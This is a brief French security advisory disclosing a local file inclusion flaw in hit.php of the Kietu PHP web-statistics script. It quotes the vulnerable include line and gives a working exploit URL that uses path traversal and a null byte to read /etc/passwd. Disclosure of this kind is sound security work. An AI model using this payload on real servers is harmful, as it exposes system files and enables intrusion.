[::] Produit : Kietu
[::] Langage : PHP
[::] Description : Kietu? est un script ecrit en PHP, qui
requiert une base de donnee mySQL, et qui vous permet de generer et
consulter les statistiques d'acces a votre site web.
[::] Site web officiel : http://www.Kietu.net/
[::] Page vulnerable : hit.php
[::] Faille de securite : Local File Inclusion
[::] Code vulnerable : ( Ligne 2 ) -> include_once
$url_hit.'class/kdetect.class.php';
[::] Exploitation :
http://localhost/kietu/hit.php?url_hit=../../../../../etc/passwd%00
@ [::] Credit : Avis de securite par cdg393 ->
cdg393_gmail_com :)